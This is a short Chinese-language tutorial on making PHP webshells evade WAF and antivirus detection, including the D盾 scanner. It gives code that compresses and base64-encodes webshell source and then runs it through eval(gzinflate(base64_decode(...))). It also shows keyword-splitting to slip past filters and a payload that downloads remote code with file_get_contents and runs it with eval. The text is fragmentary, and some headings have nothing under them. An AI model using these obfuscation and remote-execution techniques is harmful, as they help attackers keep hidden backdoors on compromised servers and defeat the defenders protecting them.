Part 1 前言
Part 2 免杀
执行代码
eval 或 preg_replace的/e修饰符来执行大马代码。
$a = 'phpinfo();';eval($a);//eval执行php代码
编码
如果直接去执行代码,是过不了waf的,我们一般需要将大马源码进行编码。
eval_gzinflate_base64类型加密与解密:
http://www.zhuisu.net/tool/phpencode.php
https://www.mobilefish.com/services/eval_gzinflate_base64/eval_gzinflate_base64.php
自己写脚本加密:
$code= file_get_contents('D:\phpStudy\WWW\Test\Zlib\help.txt'); //大马源码路径
$encode = base64_encode(gzdeflate($code)); //加密函数自己修改就行
echo $encode; //输出加密后代码
解码
通过解码执行我们的代码。
eval(gzinflate(base64_decode('S03OyFdQ8shUKLbMTVOyBgA=')));?>
关键字免杀
//类型这样的关键字如果没有混淆拆分是过不了waf的
eval(gzinflate(base64_decode
//我们需要做的就是关键字免杀
免杀 payload
D盾
查杀
免杀远程执行 payload
$f = file_get_contents(PACK('H*',$$m));eval($f);
?>
免杀
远程下载 payload
免杀,D盾报了1级,可以完全免杀的,但是觉得没必要。
Part 3 总结